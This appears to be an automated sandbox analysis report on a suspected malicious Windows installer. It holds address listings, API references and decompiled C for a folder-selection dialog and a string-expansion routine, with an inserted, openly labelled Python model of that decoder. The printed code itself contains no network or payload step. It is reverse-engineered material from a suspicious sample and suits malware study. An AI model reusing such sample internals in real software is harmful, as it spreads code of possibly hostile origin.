                    0x00404909
                    0x00404909
                    0x0040490d
                    0x0040490f
                    0x00404912
                    0x00404914
                    0x00404917
                    0x0040492d
                    0x0040492d
                    0x00404919
                    0x00404919
                    0x0040491f
                    0x00404921
                    0x00404928
                    0x00404923
                    0x00404923
                    0x00404923
                    0x00404921
                    0x00404931
                    0x00404933
                    0x00404938
                    0x00404941
                    0x00404942
                    0x0040494c
                    0x0040494c
                    0x0040494e
                    0x00404951
                    0x00404951
                    0x00404912
                    0x00000000
                    0x004048ff
                    0x004048e3
                    0x004048e6
                    0x004048ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004048ea
                    0x004048c8
                    0x004048cf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004048b7
                    0x004048b7
                    0x004048ba
                    0x004049a7
                    0x004049a7
                    0x004049ae
                    0x00404a22
                    0x00404a22
                    0x00404a29
                    0x00404a35
                    0x00404a35
                    0x00404a37
                    0x00404a3e
                    0x00404a40
                    0x00404a45
                    0x00404a47
                    0x00404a4a
                    0x00404a4a
                    0x00404a50
                    0x00404a55
                    0x00404a57
                    0x00404a5a
                    0x00404a5a
                    0x00404a60
                    0x00404a66
                    0x00404a6c
                    0x00404a6c
                    0x00404a72
                    0x00404a79
                    0x00404bc6
                    0x00404bc6
                    0x00404bcd
                    0x00404bcf
                    0x00404bd6
                    0x00404bda
                    0x00404be7
                    0x00404be7
                    0x00404bea
                    0x00404bf0
                    0x00404c02
                    0x00404c02
                    0x00404bd6
                    0x00000000
                    0x00404a7f
                    0x00404a81
                    0x00404a86
                    0x00404a89
                    0x00404a8d
                    0x00404a8d
                    0x00404a92
                    0x00404a95
                    0x00404ad6
                    0x00404ad8
                    0x00404ae2
                    0x00404ae8
                    0x00404aeb
                    0x00404af0
                    0x00404af7
                    0x00404afa
                    0x00404b9c
                    0x00404ba2
                    0x00404ba8
                    0x00404bad
                    0x00404bb0
                    0x00404bc1
                    0x00404bc1
                    0x00000000
                    0x00404b00
                    0x00404b00
                    0x00404b00
                    0x00404b03
                    0x00404b09
                    0x00404b0c
                    0x00404b0e
                    0x00404b10
                    0x00404b12
                    0x00404b15
                    0x00404b18
                    0x00404b1f
                    0x00404b21
                    0x00404b24
                    0x00404b2b
                    0x00404b2e
                    0x00404b2e
                    0x00404b2e
                    0x00404b2e
                    0x00404b32
                    0x00404b35
                    0x00404b41
                    0x00404b42
                    0x00404b45
                    0x00404b47
                    0x00404b47
                    0x00404b47
                    0x00404b37
                    0x00404b39
                    0x00404b39
                    0x00404b66
                    0x00404b66
                    0x00404b67
                    0x00404b73
                    0x00404b82
                    0x00404b82
                    0x00404b84
                    0x00404b87
                    0x00404b90
                    0x00404b90
                    0x00000000
                    0x00404b03
                    0x00404a97
                    0x00404aa2
                    0x00404aa5
                    0x00404aaa
                    0x00404aac
                    0x00404aae
                    0x00404ab0
                    0x00404ac0
                    0x00404aca
                    0x00404acc
                    0x00404acf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00404ab2
                    0x00404ab2
                    0x00404ab2
                    0x00404ab5
                    0x00404ab8
                    0x00404aba
                    0x00404aba
                    0x00404aba
                    0x00404abb
                    0x00404abc
                    0x00404abc
                    0x00000000
                    0x00404ab2
                    0x00404a95
                    0x00404a79
                    0x004049b0
                    0x004049b6
                    0x00000000
                    0x00000000
                    0x004049c2
                    0x004049c6
                    0x00000000
                    0x00000000
                    0x004049d6
                    0x004049d8
                    0x004049db
                    0x00000000
                    0x00000000
                    0x004049ed
                    0x004049ef
                    0x004049f2
                    0x004049fc
                    0x004049fe
                    0x004049ff
                    0x00404a00
                    0x00404a0f
                    0x00404a11
                    0x00404a18
                    0x00404a1b
                    0x00000000
                    0x00404a1b
                    0x004049f4
                    0x004049f7
                    0x004049fa
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004049fa
                    0x00000000
                    0x004048ba
                    0x0040466c
                    0x00404671
                    0x00404676
                    0x0040467b
                    0x0040467c
                    0x00404685
                    0x00404690
                    0x0040469b
                    0x004046a1
                    0x004046af
                    0x004046c4
                    0x004046c9
                    0x004046d4
                    0x004046dd
                    0x004046f2
                    0x00404703
                    0x00404710
                    0x00404710
                    0x00404715
                    0x0040471b
                    0x0040471d
                    0x00404720
                    0x00404725
                    0x0040472a
                    0x0040472c
                    0x0040472c
                    0x0040474c
                    0x0040474c
                    0x0040474e
                    0x0040474f
                    0x00404754
                    0x00404757
                    0x0040475a
                    0x0040475e
                    0x00404763
                    0x00404768
                    0x0040476c
                    0x00404771
                    0x00404776
                    0x00404778
                    0x0040477a
                    0x00404780
                    0x0040484a
                    0x0040485d
                    0x00000000
                    0x00404786
                    0x00404789
                    0x0040478c
                    0x0040478f
                    0x0040478f
                    0x00404795
                    0x0040479b
                    0x0040479e
                    0x004047a4
                    0x004047a5
                    0x004047aa
                    0x004047b3
                    0x004047ba
                    0x004047bd
                    0x004047c0
                    0x004047c3
                    0x004047fd
                    0x004047ff
                    0x00404828
                    0x00404801
                    0x0040480e
                    0x0040480e
                    0x004047c5
                    0x004047c8
                    0x004047d7
                    0x004047e1
                    0x004047e9
                    0x004047f0
                    0x004047f8
                    0x004047f8
                    0x004047c3
                    0x0040482e
                    0x0040482f
                    0x00404835
                    0x0040483b
                    0x0040483b
                    0x00404848
                    0x00404863
                    0x00404867
                    0x00404884
                    0x00404889
                    0x0040488c
                    0x0040488c
                    0x00000000
                    0x00404869
                    0x0040486e
                    0x00404877
                    0x00404c04
                    0x00404c16
                    0x00404c16
                    0x00404867
                    0x00000000
                    0x00404848
                    0x00404780

                    APIs
                    • GetDlgItem.USER32 ref: 0040462F
                    • GetDlgItem.USER32 ref: 0040463C
                    • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404688
                    • LoadBitmapA.USER32 ref: 0040469B
                    • SetWindowLongA.USER32(?,000000FC,00404C19), ref: 004046B5
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004046C9
                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004046DD
                    • SendMessageA.USER32(?,00001109,00000002), ref: 004046F2
                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004046FE
                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404710
                    • DeleteObject.GDI32(?), ref: 00404715
                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404740
                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 0040474C
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                    • GetWindowLongA.USER32 ref: 0040484F
                    • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040485D
                    • ShowWindow.USER32(?,00000005), ref: 0040486E
                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                    • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                    • GlobalFree.KERNEL32 ref: 00404A5A
                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                    • ShowWindow.USER32(?,00000000), ref: 00404BF0
                    • GetDlgItem.USER32 ref: 00404BFB
                    • ShowWindow.USER32(00000000), ref: 00404C02
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                    • String ID: $M$N
                    • API String ID: 1638840714-813528018
                    • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                    • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                    • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                    • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                    				signed int _v8;
                    				struct HWND__* _v12;
                    				long _v16;
                    				long _v20;
                    				char _v24;
                    				long _v28;
                    				char _v32;
                    				intOrPtr _v36;
                    				long _v40;
                    				signed int _v44;
                    				CHAR* _v52;
                    				intOrPtr _v56;
                    				intOrPtr _v60;
                    				intOrPtr _v64;
                    				CHAR* _v68;
                    				void _v72;
                    				char _v76;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr _t81;
                    				long _t86;
                    				signed char* _t88;
                    				void* _t94;
                    				signed int _t95;
                    				signed short _t113;
                    				signed int _t117;
                    				char* _t122;
                    				intOrPtr _t124;
                    				intOrPtr* _t138;
                    				signed int* _t145;
                    				intOrPtr _t147;
                    				signed int _t148;
                    				signed int _t153;
                    				struct HWND__* _t159;
                    				CHAR* _t162;
                    				int _t163;
                    
                    				_t81 =  *0x4297a8;
                    				_v36 = _t81;
                    				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
                    				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                    				if(_a8 == 0x40b) {
                    					E004051D0(0x3fb, _t162);
                    					E00405B89(_t162);
                    				}
                    				if(_a8 != 0x110) {
                    					L8:
                    					if(_a8 != 0x111) {
                    						L20:
                    						if(_a8 == 0x40f) {
                    							L22:
                    							_v8 = _v8 & 0x00000000;
                    							_v12 = _v12 & 0x00000000;
                    							E004051D0(0x3fb, _t162);
                    							if(E004054FF(_t180, _t162) == 0) {
                    								_v8 = 1;
                    							}
                    							E0040592B(0x428fa0, _t162);
                    							_t145 = 0;
                    							_t86 = E00405C49(0);
                    							_v16 = _t86;
                    							if(_t86 == 0) {
                    								L31:
                    								E0040592B(0x428fa0, _t162);
                    								_t88 = E004054B2(0x428fa0);
                    								if(_t88 != _t145) {
                    									 *_t88 =  *_t88 & 0x00000000;
                    								}
                    								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                    									_t153 = _a8;
                    									goto L37;
                    								} else {
                    									_t163 = 0x400;
                    									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                    									_v12 = 1;
                    									goto L38;
                    								}
                    							} else {
                    								if(0 == 0x428fa0) {
                    									L30:
                    									_t145 = 0;
                    									goto L31;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
                    									if(_t113 != 0) {
                    										break;
                    									}
                    									if(_t145 != 0) {
                    										 *_t145 =  *_t145 & _t113;
                    									}
                    									_t145 = E00405465(0x428fa0) - 1;
                    									 *_t145 = 0x5c;
                    									if(_t145 != 0x428fa0) {
                    										continue;
                    									} else {
                    										goto L30;
                    									}
                    								}
                    								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                    								_v12 = 1;
                    								_t145 = 0;
                    								L37:
                    								_t163 = 0x400;
                    								L38:
                    								_t94 = E0040456B(5);
                    								if(_v12 != _t145 && _t153 < _t94) {
                    									_v8 = 2;
                    								}
                    								_t147 =  *0x42e33c; // 0x6c4e95
                    								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                    									E004044B6(0x3ff, 0xfffffffb, _t94);
                    									if(_v12 == _t145) {
                    										SetDlgItemTextA(_a4, _t163, 0x428f90);
                    									} else {
                    										E004044B6(_t163, 0xfffffffc, _t153);
                    									}
                    								}
                    								_t95 = _v8;
                    								 *0x42ec04 = _t95;
                    								if(_t95 == _t145) {
                    									_v8 = E0040140B(7);
                    								}
                    								if(( *(_v36 + 0x14) & _t163) != 0) {
                    									_v8 = _t145;
                    								}
                    								E00403CFF(0 | _v8 == _t145);
                    								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
                    									E004040B0();
                    								}
                    								 *0x429fc4 = _t145;
                    								goto L53;
                    							}
                    						}
                    						_t180 = _a8 - 0x405;
                    						if(_a8 != 0x405) {
                    							goto L53;
                    						}
                    						goto L22;
                    					}
                    					_t117 = _a12 & 0x0000ffff;
                    					if(_t117 != 0x3fb) {
                    						L12:
                    						if(_t117 == 0x3e9) {
                    							_t148 = 7;
                    							memset( &_v72, 0, _t148 << 2);
                    							_v76 = _a4;
                    							_v68 = 0x429fd8;
                    							_v56 = E00404450;
                    							_v52 = _t162;
                    							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
                    							_t122 =  &_v76;
                    							_v60 = 0x41;
                    							__imp__SHBrowseForFolderA(_t122);
                    							if(_t122 == 0) {
                    								_a8 = 0x40f;
                    							} else {
                    								__imp__CoTaskMemFree(_t122);
                    								E0040541E(_t162);
                    								_t124 =  *0x42eb70; // 0x6bfe70
                    								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                    								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                    									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
                    									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
                    										lstrcatA(_t162, 0x42db00);
                    									}
                    								}
                    								 *0x429fc4 =  &(( *0x429fc4)[0]);
                    								SetDlgItemTextA(_a4, 0x3fb, _t162);
                    							}
                    						}
                    						goto L20;
                    					}
                    					if(_a12 >> 0x10 != 0x300) {
                    						goto L53;
                    					}
                    					_a8 = 0x40f;
                    					goto L12;
                    				} else {
                    					_t159 = _a4;
                    					_v12 = GetDlgItem(_t159, 0x3fb);
                    					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
                    						E0040541E(_t162);
                    					}
                    					 *0x42e338 = _t159;
                    					SetWindowTextA(_v12, _t162);
                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                    					_push(1);
                    					E00403CDD(_t159);
                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                    					_push(0x14);
                    					E00403CDD(_t159);
                    					E00403D12(_v12);
                    					_t138 = E00405C49(7);
                    					if(_t138 == 0) {
                    						L53:
                    						return E00403D44(_a8, _a12, _a16);
                    					}
                    					 *_t138(_v12, 1);
                    					goto L8;
                    				}
                    			}

                    (Address column for the E0040411B listing above, one address per decompiled line, from 0x00404121 to 0x0040444d.)

                    APIs
                    • GetDlgItem.USER32 ref: 00404167
                    • SetWindowTextA.USER32(?,?), ref: 00404194
                    • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                    • CoTaskMemFree.OLE32(00000000), ref: 00404254
                    • lstrcmpiA.KERNEL32(qdrjldxxem,00429FD8,00000000,?,?), ref: 00404286
                    • lstrcatA.KERNEL32(?,qdrjldxxem), ref: 00404292
                    • SetDlgItemTextA.USER32 ref: 004042A2
                      • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                      • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                      • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                      • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                      • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                    • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                    • SetDlgItemTextA.USER32 ref: 004043EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp
                    Similarity
                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                    • String ID: A$C:\Users\user\AppData\Local\Temp$qdrjldxxem
                    • API String ID: 2246997448-3988783955
                    • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                    • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                    • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                    • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				struct _ITEMIDLIST* _v12;
                    				signed int _v16;
                    				signed char _v20;
                    				signed char _v24;
                    				signed int _v28;
                    				signed int _t36;
                    				CHAR* _t37;
                    				signed char _t39;
                    				signed int _t40;
                    				int _t41;
                    				char _t51;
                    				char _t52;
                    				char _t54;
                    				char _t56;
                    				void* _t64;
                    				signed int _t68;
                    				intOrPtr _t72;
                    				signed int _t73;
                    				signed char _t74;
                    				intOrPtr _t77;
                    				char _t81;
                    				void* _t83;
                    				CHAR* _t84;
                    				void* _t86;
                    				signed int _t93;
                    				signed int _t95;
                    				void* _t96;
                    
                    				_t86 = __esi;
                    				_t83 = __edi;
                    				_t64 = __ebx;
                    				_t36 = _a8;
                    				if(_t36 < 0) {
                    					_t77 =  *0x42e33c; // 0x6c4e95
                    					_t36 =  *(_t77 - 4 + _t36 * 4);
                    				}
                    				_t72 =  *0x42eb98; // 0x6c3bb4
                    				_t73 = _t72 + _t36;
                    				_t37 = 0x42db00;
                    				_push(_t64);
                    				_push(_t86);
                    				_push(_t83);
                    				_t84 = 0x42db00;
                    				if(_a4 - 0x42db00 < 0x800) {
                    					_t84 = _a4;
                    					_a4 = _a4 & 0x00000000;
                    				}
                    				while(1) {
                    					_t81 =  *_t73;
                    					if(_t81 == 0) {
                    						break;
                    					}
                    					__eflags = _t84 - _t37 - 0x400;
                    					if(_t84 - _t37 >= 0x400) {
                    						break;
                    					}
                    					_t73 = _t73 + 1;
                    					__eflags = _t81 - 0xfc;
                    					_a8 = _t73;
                    					if(__eflags <= 0) {
                    						if(__eflags != 0) {
                    							 *_t84 = _t81;
                    							_t84 =  &(_t84[1]);
                    							__eflags = _t84;
                    						} else {
                    							 *_t84 =  *_t73;
                    							_t84 =  &(_t84[1]);
                    							_t73 = _t73 + 1;
                    						}
                    						continue;
                    					}
                    					_t39 =  *(_t73 + 1);
                    					_t74 =  *_t73;
                    					_a8 = _a8 + 2;
                    					_v20 = _t39;
                    					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                    					_t68 = _t74;
                    					_t40 = _t39 | 0x00000080;
                    					__eflags = _t81 - 0xfe;
                    					_v28 = _t68;
                    					_v24 = _t74 | 0x00000080;
                    					_v16 = _t40;
                    					if(_t81 != 0xfe) {
                    						__eflags = _t81 - 0xfd;
                    						if(_t81 != 0xfd) {
                    							__eflags = _t81 - 0xff;
                    							if(_t81 == 0xff) {
                    								__eflags = (_t40 | 0xffffffff) - _t93;
                    								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                    							}
                    							L41:
                    							_t41 = lstrlenA(_t84);
                    							_t73 = _a8;
                    							_t84 =  &(_t84[_t41]);
                    							_t37 = 0x42db00;
                    							continue;
                    						}
                    						__eflags = _t93 - 0x1d;
                    						if(_t93 != 0x1d) {
                    							__eflags = (_t93 << 0xa) + 0x42f000;
                    							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
                    						} else {
                    							E00405889(_t84,  *0x42eb68);
                    						}
                    						__eflags = _t93 + 0xffffffeb - 7;
                    						if(_t93 + 0xffffffeb < 7) {
                    							L32:
                    							E00405B89(_t84);
                    						}
                    						goto L41;
                    					}
                    					_t95 = 2;
                    					_t51 = GetVersion();
                    					__eflags = _t51;
                    					if(_t51 >= 0) {
                    						L12:
                    						_v8 = 1;
                    						L13:
                    						__eflags =  *0x42ebe4;
                    						if( *0x42ebe4 != 0) {
                    							_t95 = 4;
                    						}
                    						__eflags = _t68;
                    						if(_t68 >= 0) {
                    							__eflags = _t68 - 0x25;
                    							if(_t68 != 0x25) {
                    								__eflags = _t68 - 0x24;
                    								if(_t68 == 0x24) {
                    									GetWindowsDirectoryA(_t84, 0x400);
                    									_t95 = 0;
                    								}
                    								while(1) {
                    									__eflags = _t95;
                    									if(_t95 == 0) {
                    										goto L29;
                    									}
                    									_t52 =  *0x42eb64; // 0x73e81340
                    									_t95 = _t95 - 1;
                    									__eflags = _t52;
                    									if(_t52 == 0) {
                    										L25:
                    										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                    										__eflags = _t54;
                    										if(_t54 != 0) {
                    											L27:
                    											 *_t84 =  *_t84 & 0x00000000;
                    											__eflags =  *_t84;
                    											continue;
                    										}
                    										__imp__SHGetPathFromIDListA(_v12, _t84);
                    										__imp__CoTaskMemFree(_v12);
                    										__eflags = _t54;
                    										if(_t54 != 0) {
                    											goto L29;
                    										}
                    										goto L27;
                    									}
                    									__eflags = _v8;
                    									if(_v8 == 0) {
                    										goto L25;
                    									}
                    									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                    									__eflags = _t56;
                    									if(_t56 == 0) {
                    										goto L29;
                    									}
                    									goto L25;
                    								}
                    								goto L29;
                    							}
                    							GetSystemDirectoryA(_t84, 0x400);
                    							goto L29;
                    						} else {
                    							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
                    							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
                    							__eflags =  *_t84;
                    							if( *_t84 != 0) {
                    								L30:
                    								__eflags = _v20 - 0x1a;
                    								if(_v20 == 0x1a) {
                    									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                    								}
                    								goto L32;
                    							}
                    							E0040594D(_t71, _t84, _t95, _t84, _v20);
                    							L29:
                    							__eflags =  *_t84;
                    							if( *_t84 == 0) {
                    								goto L32;
                    							}
                    							goto L30;
                    						}
                    					}
                    					__eflags = _t51 - 0x5a04;
                    					if(_t51 == 0x5a04) {
                    						goto L12;
                    					}
                    					__eflags = _v20 - 0x23;
                    					if(_v20 == 0x23) {
                    						goto L12;
                    					}
                    					__eflags = _v20 - 0x2e;
                    					if(_v20 == 0x2e) {
                    						goto L12;
                    					} else {
                    						_v8 = _v8 & 0x00000000;
                    						goto L13;
                    					}
                    				}
                    				 *_t84 =  *_t84 & 0x00000000;
                    				if(_a4 == 0) {
                    					return _t37;
                    				}
                    				return E0040592B(_a4, _t37);
                    			}
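The decompiled E0040594D above is a string expander: it walks an encoded byte string, copies bytes below 0xfc literally, treats 0xfc as "copy the next byte unchanged", and treats 0xfd, 0xfe and 0xff as two-byte references whose index is ((hi & 0x7f) << 7) | (lo & 0x7f). 0xfd copies a 1024-byte variable slot at (idx << 10) + 0x42f000 (index 0x1d is rendered from *0x42eb68 instead), 0xff recurses on the negative index (-1 - idx) that the prologue maps through the table at *0x42e33c, the 0xfe branch resolves a folder through SHGetSpecialFolderLocation or the registry, and output is capped at 0x400 bytes. The following Python model is an added example, not code from the report or from the sample: the variable slots, language-string table, parent-window handle and 0xfe folder lookup are replaced by in-memory dicts so it runs offline, E00405B89 is modelled as stripping a trailing backslash (the listing only shows it walking the string with CharNextA/CharPrevA), and E00405889 is assumed to format the window handle as a decimal number. The 0xfe branch is simplified to a lookup by index and does not reproduce the registry fallback or the Quick Launch suffix.

```python
# Added example, not part of the analysis report or of the sample: a Python
# model of the escape decoder visible in the decompiled E0040594D listing.
# Comments marked "listing:" are taken from that code; everything else is an
# assumption made so the example runs offline.

OUT_LIMIT = 0x400        # listing: loop stops once the output reaches 0x400 bytes
ESC_LITERAL = 0xFC       # listing: copy the following byte unchanged
ESC_VAR = 0xFD           # listing: 1024-byte variable slot at (idx << 10) + 0x42f000
ESC_SHELL = 0xFE         # listing: folder resolved via shell/registry APIs
ESC_LANGSTR = 0xFF       # listing: recursion on index (-1 - idx), a table entry
VAR_HWNDPARENT = 0x1D    # listing: this index is rendered from *0x42eb68, not a slot
PATH_CLEAN_INDEXES = range(0x15, 0x15 + 7)   # listing: (idx - 0x15) < 7 runs E00405B89


def decode_index(lo: int, hi: int) -> int:
    """listing: ((hi & 0x7f) << 7) | (lo & 0x7f) from the two bytes after an escape."""
    return ((hi & 0x7F) << 7) | (lo & 0x7F)


def encode_ref(esc: int, idx: int) -> bytes:
    """Inverse of decode_index with the 0x80 bits set (the listing ORs 0x80 into
    both bytes before storing them, so this layout round-trips). Used to build
    the constructed test input below."""
    return bytes([esc, (idx & 0x7F) | 0x80, ((idx >> 7) & 0x7F) | 0x80])


def clean_path(s: str) -> str:
    """Assumption: E00405B89 is modelled as stripping a trailing backslash."""
    return s.rstrip("\\") or s


class EncodedStringDecoder:
    """Hypothetical name; the report never names this string format."""

    def __init__(self, variables, shell_folders, lang_strings, hwnd_parent):
        self.variables = variables          # idx -> str, stands in for the 0x42f000 slots
        self.shell_folders = shell_folders  # idx -> str, stands in for the 0xfe resolution
        self.lang_strings = lang_strings    # negative idx -> encoded bytes (table at *0x42e33c)
        self.hwnd_parent = hwnd_parent      # stands in for *0x42eb68

    def decode(self, data: bytes, out_limit: int = OUT_LIMIT) -> str:
        out = bytearray()
        i = 0
        # listing: stop on a NUL input byte or once the output bound is reached
        while i < len(data) and data[i] != 0 and len(out) < out_limit:
            b = data[i]
            i += 1
            if b < ESC_LITERAL:
                out.append(b)
                continue
            if b == ESC_LITERAL:
                if i >= len(data):       # our guard: the listing does not bound the input
                    break
                out.append(data[i])
                i += 1
                continue
            if i + 1 >= len(data):       # our guard: truncated two-byte index
                break
            lo, hi = data[i], data[i + 1]
            i += 2
            idx = decode_index(lo, hi)
            if b == ESC_VAR:
                if idx == VAR_HWNDPARENT:
                    piece = str(self.hwnd_parent)   # assumption: E00405889 prints the handle
                else:
                    piece = self.variables.get(idx, "")
                if idx in PATH_CLEAN_INDEXES:
                    piece = clean_path(piece)
            elif b == ESC_SHELL:
                piece = self.shell_folders.get(idx, "")   # simplified 0xfe branch
            else:  # ESC_LANGSTR
                piece = self.decode(self.lang_strings.get(-1 - idx, b""))
            out += piece.encode("latin-1")
        return out.decode("latin-1")


def build_demo() -> "EncodedStringDecoder":
    """Constructed tables for the demo; none of these values come from the sample."""
    return EncodedStringDecoder(
        variables={0x03: "myapp", 0x16: "C:\\Program Files\\"},
        shell_folders={0x1A: "C:\\Users\\user\\AppData\\Roaming"},
        lang_strings={-2: b"Destination: " + encode_ref(ESC_VAR, 0x16)},
        hwnd_parent=0x30408,
    )


def demo() -> str:
    """Decode a constructed string using every escape the listing handles."""
    data = (encode_ref(ESC_LANGSTR, 1) + b" " + encode_ref(ESC_VAR, 3) + b"\\"
            + bytes([ESC_LITERAL, 0xFE]) + b"\x00tail")   # NUL ends decoding
    return build_demo().decode(data)


if __name__ == "__main__":
    print(repr(demo()))
```

The constructed input exercises a language-string reference that itself contains a variable reference (the recursion), a variable in the path-cleaning range, a plain variable, an escaped 0xfe byte and the NUL terminator; the output cap and the truncated-index guard are the two edge cases worth checking separately.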

                    (Address column for the E0040594D listing above, one address per decompiled line, starting at 0x0040594d.)
                    0x00000000
                    0x00405a89
                    0x00405a90
                    0x00405a91
                    0x00405a93
                    0x00405aad
                    0x00405abb
                    0x00405ac1
                    0x00405ac3
                    0x00405ade
                    0x00405ade
                    0x00405ade
